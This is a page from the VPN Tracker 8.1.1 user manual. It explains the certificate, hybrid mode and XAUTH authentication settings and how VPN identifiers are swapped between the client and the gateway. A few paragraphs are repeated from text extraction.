Extended authentication (xauth), Identifiers – equinux VPN Tracker 8.1.1 User Manual

Certificate

The VPN client and the VPN gateway mutually authenticate using X.509 cer-
tificates (RSA signatures). This method is very secure, but requires an infra-
structure for creating and distributing certificates, and a VPN gateway that
supports it.

The client's certificate and private key (also called an "identity") need to be
present in the OS X keychain.

The VPN gateway's certificate can in most cases be sent by the VPN gateway
and verified just as a web browser would do for HTTPS, however, it is also pos-
sible to add it to the local keychain and select that specific certificate in VPN
Tracker.

Hybrid Mode

The VPN gateway authenticates itself with a certificate, and users authenticate
themselves through Extended Authentication (XAUTH). This method is sup-
ported by a small number of vendors (e.g. Check Point) and considered more
secure than using an Aggressive Mode connection with just a pre-shared key.

The VPN gateway's certificate can in most cases be sent by the VPN gateway,
but it is also possible to add it to the local keychain and set that specific cer-
tificate in VPN Tracker.

Related Settings: (certificates only) Advanced > Certificates
(pre-shared key only) Advanced > Phase 1 Diffie-Hellman Group, Advanced >
Additional Settings > Credentials

Availability: According to the selected device profile.

VPN Gateway Setting: (Pre-Shared Key) Pre-shared secret, shared secret,
password, key, (Certificates) X.509 certificates, RSA signatures

Extended Authentication (XAUTH)

Extended authentication is a way of authenticating individual users on top of
one of the general authentication methods, pre-shared key or certificates (hy-
brid mode already incorporates XAUTH).

In its basic form, XAUTH asks for a username and password, however it is also
possible for the VPN gateway to ask for passcodes (such as the ones gener-
ated by RSA SecurID tokens) etc.

It is possible to store the XAUTH username and password in the OS X key-
chain, or be prompted every time the VPN connections.

XAUTH can be set to "Automatic", even if it is actually turned off
on the VPN gateway. The VPN gateway will tell VPN Tracker if
XAUTH should be used or not. However, there are VPN gateways
that need XAUTH specifically turned on or off, that's where the
"Off" and "Always" settings can help.

Related Settings: Advanced > Additional Settings > Credentials

Availability: According to the selected device profile.

VPN Gateway Setting: XAUTH, user authentication

Identifiers

The identifiers are small pieces of identifying information that VPN Tracker and
the VPN gateway use to recognize each other.

Related Settings: Basic > VPN Gateway (for “Remote Endpoint IP Address”)
Basic > Authentication > Certificates (for “Local/Remote Certificate”)

Related Settings: Basic > VPN Gateway (for “Remote Endpoint IP Address”)
Basic > Authentication > Certificates (for “Local/Remote Certificate”)

Availability: Identifiers are determined automatically if SonicWALL Simple
Client Provisioning is used.

Availability: Identifiers are determined automatically if SonicWALL Simple
Client Provisioning is used.

VPN Gateway Setting: The local identifier from VPN Tracker's perspective is
the remote (!) identifier from the VPN gateway's perspective, and vice versa.
Therefore you will normally have to swap the identifiers configured on the
VPN gateway when entering them in VPN Tracker:

VPN Gateway Setting: The local identifier from VPN Tracker's perspective is
the remote (!) identifier from the VPN gateway's perspective, and vice versa.
Therefore you will normally have to swap the identifiers configured on the
VPN gateway when entering them in VPN Tracker:

Local Identifier:

Remote Identifier:

Remote Identifier (or client/peer identifier/identity/ID)
Local Identifier (or own/my identifier/identity/ID)

46